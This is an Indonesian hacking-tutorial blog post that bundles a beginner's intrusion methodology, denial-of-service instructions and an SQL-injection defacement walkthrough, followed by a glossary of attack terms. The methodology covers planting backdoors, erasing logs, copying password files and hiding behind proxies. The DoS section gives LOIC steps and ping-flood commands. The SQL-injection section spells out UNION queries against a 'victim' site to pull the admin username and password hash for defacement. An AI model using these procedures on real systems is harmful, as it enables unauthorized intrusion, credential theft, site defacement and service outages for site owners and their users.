Sunday, November 24, 2013

Belajar Menjadi Hacker Bag 1

creativeboy9.blogspot.com
Dalam suatu kesempatan, saya pernah melihat seorang auditor keamanan jaringan melalukan penetration test (pen-test) terhadap suatu sistem IT. Karena penasaran saya melihat sedikit2 cara penetration test yang dilakukan. Waktu itu saya belum banyak tahutools apa aja yang digunakan, yang saya tau dia menggunakan tcpdump untuk menganalisis paket apa aja yang lewat, trus untuk men-scan beberapa host menggunakan Nessus. Ada salah satu aplikasi yang digunakan berbasis web yang terdapat kumpulan beberapa exploit. Waktu itu saya belum tahu aplikasi apa itu, yang saya ingat aplikasi itu menggunakan alamat http://127.0.0.1:55555, nah berbekal port 55555 saya mencari di google, dan ternyata itu adalah Metasploit Framework!.

Peristiwa itu menginspirasikan saya untuk mengenang masa-masa lalu ketika masih seneng2nya ngoprek dan belum ‘tercemar’ oleh DotA. Akhirnya sekarang saya ingin belajar ngoprek lagi, tp lebih fokus ke exploitnya saja. Tulisannya ini akan saya buat menjadi tiga bagian. Bagian pertama mengenai bagaimana salah satu cara umum yang dilakukan untuk menge-hack suatu system. Disini saya lebih menitikberatkan untuk hacking OS Windows XP, karena OS ini paling banyak dipakai orang. Bagian kedua lebih banyak ke teori mengenai exploit. Tapi karena mungkin akan sangat sulit dipahami (saya sendiri msh blm bisa membuat exploit sendiri), saya hanya menuliskan hasil terjemahan yang membahas apa itu dan cara kerja exploit. Sedangkan bagian terakhir merupakan praktek bagaimana mengelakukan penetration test menggunakan metasploit di Windows XP.

Bagian 1
*ini merupakan artikel lama mengenai salah satu cara umum yang dilakukan untuk hacking. (artikel ini jg di mirror oleh Negative a.k.a Jim Geovedi di sini). Langkah dibawah ini merupakan cara ‘standar’, hacking sebenarnya tidak harus selalu sesuai dengan ‘standar’ ini.
Hacking buat pemula
- by aCh

Artikel ini ditujukan bagi pemula, dan disusun oleh pemula. Ditulis untuk pengetahuan semata. Untuk temen2 yg udah ahli, sok aja dilewat, tapi dibaca juga gpp….
Apa sebenarnya hacking itu? klo menurut pengertian gue, hacking adalah ngoprek. Yup, hacking adalah ngoprek, mempelajari sesuatu dengan keingintahuan (curiosity) yg tinggi, ngutak atik sesuatu, ‘ngudek-ngudek’ sampai ke ‘jeroannya’. Sesuatunya apa dong? ya terserah… bisa komputer, mobil, motor, mesin. Tapi masalahnya ada ngga ya hacker mobil, hacker motor, atau hacker pesawat terbang?? hehe… Walaupun saat ini hacking identik dengan ‘bobol-membobol’, tapi gue kurang setuju klo cuman bobol server orang doang!. Ada yang bilang ‘Hacking is Art’, trus dimana letak seninya dong? Mau tau pengertian hacking sebenarnya, coba baca artikel sebelumnya (How to Become A Hacker). Di situ dijelasin bahwa hacker berkaitan dengan kemahiran teknis serta kegemaran menyelesaikan masalah dan mengatasi keterbatasan. Contoh hacker pada saat ini yang sering-sering disebut adalah Linus Torvald (tau ngga? itu lho yang menciptakan Linux). Apa dia tukang bobol? belum tentu kan….

Pada artikel ini, gue pengen membagi pengalaman mengenai Hacking, walaupun sampai saat ini gue belum pernah nge-Hack ke server orang. Salah satu cara untuk mencoba simulasi Hack yaitu H3cky0uRs3lf! Buat komputer kita sebagai server (sekaligus belajar konfigurasi server) trus install program yg dibutuhkan. Misalnya klo mo Web Hacking, coba install Apache atau IIS. Atau kita sesuaikan dengan exploit yang udah kita dapet. Tapi lebih baik install Linux atau FreeBSD dulu di komputer pribadi, trus konfigurasi sebagai server, lalu simulasi Hack, setelah itu baru Hack Betulan… Apalagi klo di kost ada jaringan.
Pro dan Kontra Hacking

Pro
Kontra
Etika Hacking
Semua informasi adalah free
Jika semua informasi adalah free, maka tidak ada ladi privacy
Aspek Security
Intrusion adalah ilustrasi kelemahan sistem
Tidak perlu menjadi pencuri untuk menunjukkan pintu yang tidak terkunci
Idle Machines
Hacking hanya pada idle machines
idle machines milik siapa ?
science education
hanya membobol tapi tidak merusak
“hacker wannabe” berpotensi sangat besar untuk merusak
Okeh, sekarang waktunya melakukan aksi…
1. Fase Persiapan
~ Mengumpulkan informasi sebanyak-banyaknya
– Secara Aktif : – portscanning
– network mapping
– OS Detection
– application fingerprinting
Semua itu bisa dilakukan menggunakan toolz tambahan seperti nmap atau netcat
– Secara Pasif : – mailing-list (jasakom, newbie_hacker, hackelink, dsb)
– via internet registries (informasi domain, IP Addres)
– Website yang menjadi terget
2. Fase Eksekusi
~ Setelah mendapatkan informasi, biasanya akan didapatkan informasi mengenai OS yg digunakan, serta port yang terbuka dengan daemon yg sedang berjalan. Selanjutnya mencari informasi mengenai vulnerability holes (celah kelemahan suatu program) dan dimanfaatkan menggunakan exploit (packetstromsecurity.org, milw0rm, milis bugtraq, atau mencari lewat #IRC).
~ Mengekspolitasi Vulnerability Holes
- compile eksploit -> local host ->
$gcc -o exploit exploit.c
$./exploit
# hostname (# tanda mendapatkan akses root)
remote host -> $gcc -o exploit exploit.c
$./exploit -t www.target.com
# (klo beruntung mendapatkan akes root)
~ Brute Force
– Secara berulang melakukan percobaan otentifikasi.
– Menebak username dan password.
– Cracking password file
~ Social Engineering
– Memperdayai user untuk memeberi tahu Username dan password
– Intinya ngibulin user….
3. Fase Setelah Eksekusi
~ Menginstall backdoor, trojans, dan rootkit
~ Menghapus jejak dengan memodifikasi file log agar tidak dicurigai admin
~ Menyalin /etc/passwd atau /etc/shadow/passwd

Nah, intinya seh cara masuk ke server seseorang seperti fase diatas. Mencari informasi, temukan exploit, dan tinggalkan backdoor. Cuma masalahnya hacking bukanlah segampang cara-cara diatas. Itu hanyalah teori, banyak hal yang harus diperhatikan jika ingin mempraketekkan hacking ke server seseorang. Jangan sekali-kali mencoba2 hacking ke server orang tanpa memperhatikan anonimitas (apalagi klo connectnya lewat komputer pribadi tanpa menggunakan proxy). Ntar klo ketahuan bisa repot. Saran gue, cobalah pada mesin localhost dulu (komuter pribadi), klo terhubung ke LAN lebih bagus. Sediakan server yang khusus buat dioprek. Kalaupun pun ga terhubung ke jaringan, kita masih bisa menggunakan Virtual Machine menggunakan VMWare seperti yang nanti akan dibahas pada bagian 3!
Referensi :
-Hacking and Defense, Jim Geovedi, negative@magnesium.net
-Network Defense, Jim Geovedi, negative@magnesium.net

Melakukan Serangan DoS Attack Bag 1

serangan DDoS Attack adalah serangan yang dilakukan pada server dengan cara membanjiri server dengan request ping atau request lainya dalam jumlah yang sangat banyak. serangan ini tidka dapat dicegah karena memang keroyokan alias ya berdo’a saja supaya situs kita tidak down akibat kena serangan DDoS Attack. ada pun cara untuk melakukan DDoS Attack sangat-sangat mudah, bahkan anak SMP pun bisa melakukanya. untuk mereka yang menggunakan OS Windows dapat menggunakan dua cara. cara pertama adalah dengan menggunakan software bernamaLow Orbit Ion Cannon, silakan download disini.program ini tidak perlu diinstall cukup jalankan seperti program portable lainya.
1. Jalankan program
2. Setelah muncul Jendela di bagian URL masukan situs yang ingin diserang misalkan www.coba.com, lalu klik lock on
3. setelah itu klik tombol IMMA CHARGIN MAH LAZER
4. silakan lihat hasilnya dibawah, disana terdapat keterangan berapa jumlah packet yang connecting, requesting, downloading, downloaded, requested  dan failed.
5. jika berhasil berarti berarti pada bagian yang failed seharusnya banyak , yang menandakan bahwa server telah down.

cara kedua adalah dengan membanjiri Ping melalui command promt alias CMD. buka start->run dan ketikan cmd, atau tekan kombinasi tombol Windows + R dan ketik cmd, kemudian enter. setelah jendela Command Prompt muncul ketikan
#ping target.com
setelah itu akan muncul nomor ip dari situs tersebut, anggaplah nomor ip adalah 192.168.1.1, kemudian saatnya melakukan serangan ke sistem server hosting target.com.
#ping 192.168.1.1 -l 39999 -n 10000000 -w 0.00001
yang berarti :
n = besarnya Ping , nilai “10000000″ silakan diubah sesuai dengan yang diinginkan .
192.168.1.1= ganti alamat ip dari situs target.com
-W 0,00001 = Ini adalah periode waktu tunggu antar satu ping.
dua cara tadi jika anda di windows, bagaimana jika di linux, hal ini jauh lebih mudah untuk dilakukan tapi hal pertama yang harus dimiliki adalah hak sebagai root. silakan ketika command ini di terminal linux.
#sudo ping -f 192.168.1.1
system akan melakukan ping sebanyak yang bisa dibuat, biasanya 10.000/menit, jika respondnya adalah Host Unreachable dll, berarti system telah down. untuk alamat 192.168.1.1 silakan ganti dengan alamat ip situs target.com.
Selamat mencoba dan Try With Yout Own Risk.
- See more at: http://www.goblooge.com/blog/cara-melakukan-ddos-attack/#sthash.siYji5Zn.dpuf

Cara Mendeface Website Tanpa Bantuan Software.

Men-deface sebuah situs itu sebenarnya pekerjaan yang tidak terlalu sulit. Bahkan untuk sekelas Hacker pemula dapat melakukannya. Banyak sekali software yang dapat digunakan seperti Havij dan sejenisnya, dan tinggal mengikuti langkahnya, semuanya jadi mudah. Tinggal cari Dork-nya, kemudian identifikasi situs korban, dan eksekusi.
Namun, ada dasar teknik tanpa software yang dapat kita lakukan. Teknik ini sebenarnya agak rumit, namun akan saya coba sederhanakan agar mudah dipraktekkan.
Sebelumnya kita harus tahu dulu yang dimaksud defacing itu sebenarnya apa. Defacing adalah tindakan untuk mengganti file index.html atau index.php situs korban dengan file yang kita miliki. Ketika file index.html atau index.php situs korban kita ganti dengan index.html atau index.php yang kita inginkan, praktis publik akan hanya melihat index.html ataupun index.php yang kita miliki.
Pengetahuan dasar yang harus dimiliki untuk melakukan defacing.
  1. SQL Injection (Untuk menganalisis loop website)
  2. Sandi Admin 
  3. Shell Script (untuk mendapatkan Kontrol Admin)
Sekarang, mari kita coba dengan cara yang paling sederhana agar mudah dipahami.
Langkah pertama adalah dengan menguji kerentanan situs korban. Misalnya saja kita mengidentifkasi situs korban sebagai berikut: http://www.korban.com/news.php?id=5. Mari kita uji apakah situs tersebut aman atau mudah dideface. Lankah yang paling sederhana adalah dengan menamnahkan tanda kutipan (‘) ke akhir url dari situs korban.
Dari contoh diatas, kemudian situs korban kita uji kerentanannya sebagai berikut:
 [code]http://www.korban.com/news.php?id=5 '[/code]
jadi jika kita mendapatkan beberapa error seperti dibawah ini:
“You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc…” atau sesuatu yang serupa yang berarti Situs rentan terhadap SQL injection.
Langkah kedua, setelah kita tahu betul bahwa situs korban tersebut rentan untuk di deface, kita lakukan langkah penemuan kolom dengan menggunakan perintah Order by. Kita lakukan pengurutan nomer sampai mendapatkan error. Sebagai contoh:
[code]http://www.korban.com/news.php?id=5 order by 1 / * <- tidak ada kesalahan
http://www.korban.com/news.php?id=5 order by 2 / * <- tidak ada kesalahan
http://www.korban.com/news.php?id=5 order by 3 / * <- tidak ada kesalahan
http://www.korban.com/news.php?id=5 order by 4 / * <- error (kita mendapatkan pesan seperti kolom ini '4 Unknown 'dalam' klausa order 'atau sesuatu seperti itu)
[/code]
Dari hasil tersebut, berarti bahwa MySQL situs korban memiliki 3 kolom, karena pada saat diurutkan (incrementing) sampai langkah ke empat terdapat error. 
Langkah ketiga adalah dengan melakukan pengujian fungsi  UNION. Dengan fungsi ini kita dapat memilih lebih banyak data dalam satu pernyataan sql.
Contohnya sebagai berikut:
[code]http://www.korban.com/news.php?id=5 union all select 1,2,3 (kita unionkan semua kolom yang sudah kita dapatkan dilangkah ke 2 diatas.)
[/code]

Catatan Penting: jika kita melihat beberapa nomor di layar monitor, yaitu 1 atau 2 atau 3 maka UNION bekerja.
Langkah keempat adalah melakukan pengujian pada versi MySQL situs korban dengan perintah tambahan tanda minus dua kali (–). Jadinya seperti dibawah ini:
[code]http://www.korban.com/news.php?id=5 union all select 1,2,3--
[/code]

Kemudian amati output yang muncul di monitor. Misalnya saja di monitor muncul angka 2, segera kita ganti URL target dengan kode “@@version” atau “version()” atau kode tertentu seperti “4.1.33″ atau yang mirip dengan angka tersebut.
URL target yang kita ganti adalah sebagai berikut:
[code]http://www.korban.com/news.php?id=5 union all select 1,@@version,3--
[/code]
Kemudian tekan enter (lakukan eksekusi).
Jika kemudian dilayar monitor muncul error sebagai berikut: “union + illegal mix of collations (IMPLICIT + COERCIBLE) …”, kemudian langkah selanjutnya adalah melakukan konversi dengan mengubah URL target sebagai berikut:
[code]http://www.korban.com/news.php?id=5 union all select 1,convert(@@version using latin1),3
atau
http://www.korban.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3[/code]

Nah, versi dari MySQL situs korban dapat kita identifikasi.
Langkah selanjutnya adalah dengan mendeteksi nama-nama dari setiap kolom tabel databse situs korban. Jika versi MySQL nya dibawah versi 5, kita dapat mengira-iranya. Misalnya saja kalau Platformnya wordpress pastilah nama tabelnya sekitar wp-content, wp-users, wp-options dan seterusnya. Dan nama kolom umumnya adalah: username, user_name, password, pass, passwd, pwd dll ..
Coba kita lakukan pengecakan nama tabel dari MySQL situs korban dengan perintah dibawah ini:
[code]http://www.korban.com/news.php?id=5 union all select 1,2,3 from admin
[/code]
Jika di monitor muncul angka misalnya “2″, maka berarti bahwa nama tabel tersebut adalah benar. Langkah selanjutnya adalah mengidentifikasi nama kolom dalam tabel admin. Dengan mengganti angka 2 dengan nama kolom yang kita inginkan. Perintahnya adalah sebagai berikut:
[code]http://www.korban.com/news.php?id=5 union all select 1,username,3 from admin
[/code]

Jika muncul nama di layar monitor, maka itulah nama admin dari situs korban. Langkah selanjutnya adalah mengidentifikasi password admin.
[code]http://www.korban.com/news.php?id=5 union all select 1,password,3 from admin
[/code]
Jika dilayar muncul kode (biasanya dalam bentuk enkripsi MD5), maka sukseslah injeksi MySQL kita untuk selanjutnya melakukan deface. Kode yang muncul dilayar, kemudian kita catat, dan lakukan dekripsi MD5 dengan Decrypt MD5 Generator yang banyak beredar di internet. Setelah nama admin kita dapet, password admin kita dapet, terus langkah selanjutnya ya terserah Anda.
Tetapi perlu diingat, pengetahuan ini bukan digunakan untuk mengajarkan kejahatan. Tetapi dari semua langkah tersebut diatas dapat digunakan oleh webmaster situs bersangkutan untuk menguji kerentanan situsnya. Jika dicoba dengan cara ini kemudian berhasil, maka segera lakukan perbaikan. Jangan sampai terlambat.

20 Istilah-istilah yang wajib hacker ketahui


Dalam dunia komputer remaja ini, selalu berkaitan dengan berbagai bahasa atau istilah-istila. Dunia komputer seakan menjadi ilmu external yang sangat mahal harganya, tidak seperti halnya dengan pembelajaran sekolah biasanya, dalam dunia komputer bukan hanya pengetahuan yang dapat di andalkan tapi kita di ajak agar selalu berpikir logisdan seakan menyusun taktik sehingga menghasilkan tujuan yang di harapkan.


nah, jika berbicara dalam bahasa hacking, saat ini ada beberapa hal yang mesti kita ketahui yaitu istilah-istilah dasar yang perlu di pelajari dan di ingat, mengapa? Hal yang pertama yaitu ketika kita di ajak merekrut di dunia hacking mau tidak mau kita secepatnya harus mengetahui bahasa dasar yang sering di pergunakan dalam dunia hacking atau bisa di katakan bekal pertama dan yang kedua karna seiring perkembangan zaman saat ini kita seakan mau tidak mau mengikuti arus perkembangannya. Salah satunya kita selalu di hubungkan dengan dunia manya atau internet.




Ketika itu juga perkembangan masyarakat internet dan IPTEK sehingga menghasilkan masyarakat ahli komputer jahil "hacking" yang ketika anda terjerat maka habislah anda di perdaya mereka dengan pengetahuan nya. Maka dari itu ada beberapa bahasa dasar / istilah-istilah komputer yang dapat kita ketahui bersama yaitu - cyber4rt:

  • DDoS ,kenal dengan kegiatan ddos atacker? Nah ddos merupakan kegiatan Membuat suatu sistem crash & karena overload sehingga tidak bisa diakses atau mematikan service.
  • Bug ,Bug Kesalahan pada
    pemrograman yang menyebabkan sistem dapat dieksploitasi atau error dengan kondisi tertentu. Dalam web hacking, terdapat beberapa bug seperti RFI, LFI, SQLi, RCE, XSS, dll.
  • Deface ,sama seperti kegiatan yang telah Deface share sebelummya yang Merubah tampilan halman suatu website secara paksa dan illegal.
  • Patch Perbaikan terhadap bug dengan mengupdate sistem
    yang memiliki vurnerable
    system.
  • Vurnerable merupakan sebuah Sistem yang memiliki bug sehingga rentan terhadap serangan, dan ketika hal ini terjadi maka dapat di jadikan celah dalam melakukan deface
  • Shell adalah Inti dari sistem operasi. Shell dapat digunakan untuk mengendalikan kerja sistem operasinya. Dan ketika shell telah di dapatkan maka dapat dengan mudah mengotak-atik isi bahkan melakukan pencurian data
  • Phising Adalah tindakan memperoleh informasi pribadi seperti User ID, password, PIN, nomor rekening bank, nomor kartu kredit Anda secara ilegal.. Phising merupakan hal mudah yang dapat menjerat korban dan menemukan informasinya seperti deface facebook dan lain-lain, contoh phising facebook: Phisng facebook
  • Fake Login sama halnya dengan kegiatan phising (memancing) yang merupakan Halaman tiruan/palsu yang
    dibuat untuk mengelabui user,
    bertujuan untuk mencuri
    informasi penting dari user Seperti pada kasus pencurian email n password Friendster, Facebook
  • RFI merupakan Penyisipan sebuah file dari luar ke dalam sebuah webserver dengan tujuan script di dalam akan dieksekusi pada saat file yang disisipi di-load.
  • LFI Suatu bug dimana kita bisa menginclude kan file yang merupakan file yang berada didalam server yg bersangkutan ke page yang vulnerable LFI maksudnya
  • Keylogger Adalah mesin atau software yang dipasang atau diinstal di komputer agar mencatat semua aktivitas yang terjadi pada keyboard dan software ini dapat bekerja diam diam alias tidak terketahui oleh kita secara kasat mata
  • SQL Injection merupakan Salah satu jenis penyerangan
    yang mengijinkan user tidak sah
    (penyerang) untuk mengakses
    database server.
  • Virus kelihatan tidak asing lagi bagi kita yang merupakan kumpulan bahasa pemprograman yang berupa Kode script jahat yang yang telah di program untuk mengandakan dirinya dan menginfeksi serta menjadi parasit bagi suatu sistem file yang diinfeksinya. Oleh sebab itu kita sering bertanya mengapa virus tidak dapat di basmikan karna virus itu menggandakan dirinya dengan cepat. Sekarang kode jenis ini akan sangat mudah terdeteksi pada aplikasi yang memeriksa crc32 dari dirinya.
  • Debug merupakan Kegiatan mencari bug pada aplikasi dan memperbaiki bug yang ditemukan.
  • Fake Process merupakan Proses tiruan yang dibuat untuk menyembunyikan nama proses asli, bertujuan untuk mengelabui admin sistem. Seperti mem-fake "./backdoor" menjadi "usr/sbin/httpd", sehingga ketika di "ps -ax",
    proses "./backdoor" berubah
    menjadi "usr/sbin/httpd" sehingga dapat mengelabui sasarannya
  • Backdoor merupakan Pintu belakang untuk masuk ke sistem yang telah brhasil di exploitasi oleh attacker. Bertujuan untuk jalan masuk lagi ke sistem korban sewaktu-waktu
  • Malicious Code/Script adalah Kode yang dibuat untuk
    tujuan jahat atau biasa disebut
    kode jahat.
  • Worm merupakan kelom virus yang terbuat dari Kode jahat yang sistim kerjanya seperti cacing, menggandakan diri dan menyebar, tidak menopang pada file. Kebanyakan di Indonesia adalah kode jenis ini.
  • Trojan merupakan Kode jahat yang sistim kerjanya masuk ke dalam sistem untuk mengintip dan mencuri informasi penting yg ada didalamnya kemudian
    mengirimnya kepada pemilik
    trojan.
  • XSS merupakan suatu cara
    memasukan code/script 
    kedalam suatu web site dan
    dijalankan melalui browser di client-cyber4rt
sumber : jurnal.heck.in